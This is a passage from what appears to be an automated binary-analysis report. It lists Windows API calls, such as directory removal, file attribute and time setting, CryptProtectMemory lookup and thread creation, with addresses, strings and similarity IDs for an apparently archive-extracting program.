          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
          • Part of subcall function 0012B41F: RemoveDirectoryW.KERNEL32(?,?,?,00128649,?), ref: 0012B430
          • Part of subcall function 0012B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00128649,?), ref: 0012B45E
        Similarity
        • API ID: _wcslen$DirectoryRemove$CloseFind
        • String ID:
        • API String ID: 973666142-0
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0014A861,?,00000000,?,00000001,?,?,00000001,0014A861,?), ref: 0014DB85
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014DC0E
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001480A1,?), ref: 0014DC20
        • __freea.LIBCMT ref: 0014DC29
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
        • String ID:
        • API String ID: 2652629310-0
        APIs
        • GetDC.USER32(00000000), ref: 0013B666
        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0013B675
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0013B683
        • ReleaseDC.USER32(00000000,00000000), ref: 0013B691
        Similarity
        • API ID: CapsDevice$Release
        • String ID:
        • API String ID: 1035833867-0
        APIs
        • _free.LIBCMT ref: 0014C4D4
          • Part of subcall function 001451D6: IsProcessorFeaturePresent.KERNEL32(00000017,001451A8,00000050,00154ADC,?,0012EA30,00000004,00163070,?,?,001451B5,00000000,00000000,00000000,00000000,00000000), ref: 001451D8
          • Part of subcall function 001451D6: GetCurrentProcess.KERNEL32(C0000417,00154ADC,00000050,00163070), ref: 001451FA
          • Part of subcall function 001451D6: TerminateProcess.KERNEL32(00000000), ref: 00145201
        Similarity
        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
        • String ID: *?$.
        • API String ID: 2667617558-3972193922
        APIs
        • __EH_prolog.LIBCMT ref: 001280C3
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00128262
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Similarity
        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
        • String ID: :
        • API String ID: 3226429890-336475711
        Similarity
        • API ID: _wcslen
        • String ID: }
        • API String ID: 176396367-4239843852
        APIs
          • Part of subcall function 00130620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0013063F
          • Part of subcall function 00130620: GetProcAddress.KERNEL32(0016A1F0,CryptUnprotectMemory), ref: 0013064F
        • GetCurrentProcessId.KERNEL32(?,00000200,?,00130690), ref: 00130723
        Strings
        • CryptUnprotectMemory failed, xrefs: 0013071B
        • CryptProtectMemory failed, xrefs: 001306DA
        Similarity
        • API ID: AddressProc$CurrentProcess
        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
        • API String ID: 2190909847-396321323
        APIs
        • _swprintf.LIBCMT ref: 0012CDE7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        Similarity
        • API ID: __vswprintf_c_l_swprintf
        • String ID: %c:\
        • API String ID: 1543624204-3142399695
        APIs
        • CreateThread.KERNEL32(00000000,00010000,00132470,?,00000000,00000000), ref: 0013235B
        • SetThreadPriority.KERNEL32(?,00000000), ref: 001323A2
          • Part of subcall function 001276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00127707
        Similarity
        • API ID: Thread$CreatePriority__vswprintf_c_l
        • String ID: CreateThread failed
        • API String ID: 2655393344-3849766595
        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,00132516,?), ref: 00132302
        • GetLastError.KERNEL32(?), ref: 0013230E
          • Part of subcall function 001276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00127707
        Strings
        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00132317
        Similarity
        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
        • String ID: WaitForMultipleObjects error %d, GetLastError %d
        • API String ID: 1091760877-2248577382
        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,0012ED75,?), ref: 0012F5C3
        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0012ED75,?), ref: 0012F5D1
        Similarity
        • API ID: FindHandleModuleResource
        • String ID: RTL
        • API String ID: 3537982541-834975271